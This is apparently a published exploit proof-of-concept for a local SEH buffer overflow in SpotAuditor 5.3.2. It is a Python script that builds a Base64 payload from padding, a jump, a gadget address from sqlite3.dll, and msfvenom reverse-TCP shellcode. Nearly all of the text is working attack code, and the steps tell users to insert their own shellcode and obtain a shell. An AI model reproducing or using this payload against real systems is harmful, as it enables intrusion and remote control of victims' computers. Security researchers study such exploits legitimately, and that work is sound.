# Exploit Title: SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH) # Exploit Author: Kirill Nikolaev # Date: 2019-12-06 # Vulnerable Software: SpotAuditor # Vendor Homepage: http://www.nsauditor.com/ # Version: 5.3.2 # Software Link: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe # Tested Windows 7 SP1 x86 # PoC # 1. Download and install SpotAuditor # 2. Change shellcode in python script to yours # 3. Generate payload with python script # 4. Run the software "Tools -> Base64 Encrypted Password # 5. Take a shell # Original DOS exploit https://www.exploit-db.com/exploits/47719 #!/usr/bin/env python import base64 print ("[+] Thank you for choosing our company") print ("[+] Local Buffer Overflow (SEH) in SpotAuditor 5.3.2") print ("[+] Created By Kirill Nikolaev") print ("[+] Generate payload,check, that you take your shellcode") print ("") head='A'*1024 #eb0c-jmp across a few bytes with seh address jmp_across='\x41\x41\xeb\x0c' #0x61e0b194 : pop ebx # pop ebp # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.15.2 (C:\Program Files\Nsasoft\SpotAuditor\sqlite3.dll) seh='\x94\xb1\xe0\x61' header_for_shellcode='\x41'*10 #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.58.1 LPORT=4444 -f py EXITFUNC=thread -b '\x00' buf = "" buf += b"\xbd\x7a\xfe\x84\xdd\xdb\xc9\xd9\x74\x24\xf4\x58\x31" buf += b"\xc9\xb1\x52\x83\xe8\xfc\x31\x68\x0e\x03\x12\xf0\x66" buf += b"\x28\x1e\xe4\xe5\xd3\xde\xf5\x89\x5a\x3b\xc4\x89\x39" buf += b"\x48\x77\x3a\x49\x1c\x74\xb1\x1f\xb4\x0f\xb7\xb7\xbb" buf += b"\xb8\x72\xee\xf2\x39\x2e\xd2\x95\xb9\x2d\x07\x75\x83" buf += b"\xfd\x5a\x74\xc4\xe0\x97\x24\x9d\x6f\x05\xd8\xaa\x3a" buf += b"\x96\x53\xe0\xab\x9e\x80\xb1\xca\x8f\x17\xc9\x94\x0f" buf += b"\x96\x1e\xad\x19\x80\x43\x88\xd0\x3b\xb7\x66\xe3\xed" buf += b"\x89\x87\x48\xd0\x25\x7a\x90\x15\x81\x65\xe7\x6f\xf1" buf += b"\x18\xf0\xb4\x8b\xc6\x75\x2e\x2b\x8c\x2e\x8a\xcd\x41" buf += b"\xa8\x59\xc1\x2e\xbe\x05\xc6\xb1\x13\x3e\xf2\x3a\x92" buf += b"\x90\x72\x78\xb1\x34\xde\xda\xd8\x6d\xba\x8d\xe5\x6d" buf += b"\x65\x71\x40\xe6\x88\x66\xf9\xa5\xc4\x4b\x30\x55\x15" buf += b"\xc4\x43\x26\x27\x4b\xf8\xa0\x0b\x04\x26\x37\x6b\x3f" buf += b"\x9e\xa7\x92\xc0\xdf\xee\x50\x94\x8f\x98\x71\x95\x5b" buf += b"\x58\x7d\x40\xcb\x08\xd1\x3b\xac\xf8\x91\xeb\x44\x12" buf += b"\x1e\xd3\x75\x1d\xf4\x7c\x1f\xe4\x9f\x42\x48\xdc\x5e" buf += b"\x2b\x8b\x20\x70\xf7\x02\xc6\x18\x17\x43\x51\xb5\x8e" buf += b"\xce\x29\x24\x4e\xc5\x54\x66\xc4\xea\xa9\x29\x2d\x86" buf += b"\xb9\xde\xdd\xdd\xe3\x49\xe1\xcb\x8b\x16\x70\x90\x4b" buf += b"\x50\x69\x0f\x1c\x35\x5f\x46\xc8\xab\xc6\xf0\xee\x31" buf += b"\x9e\x3b\xaa\xed\x63\xc5\x33\x63\xdf\xe1\x23\xbd\xe0" buf += b"\xad\x17\x11\xb7\x7b\xc1\xd7\x61\xca\xbb\x81\xde\x84" buf += b"\x2b\x57\x2d\x17\x2d\x58\x78\xe1\xd1\xe9\xd5\xb4\xee" buf += b"\xc6\xb1\x30\x97\x3a\x22\xbe\x42\xff\x42\x5d\x46\x0a" buf += b"\xeb\xf8\x03\xb7\x76\xfb\xfe\xf4\x8e\x78\x0a\x85\x74" buf += b"\x60\x7f\x80\x31\x26\x6c\xf8\x2a\xc3\x92\xaf\x4b\xc6" tail='B'*(5000-1028-4-10-len(buf)) shellcode=head+jmp_across+seh+header_for_shellcode+buf print (base64.b64encode(shellcode)) -- Best regards, Kirill Nikolaev Penetration Tester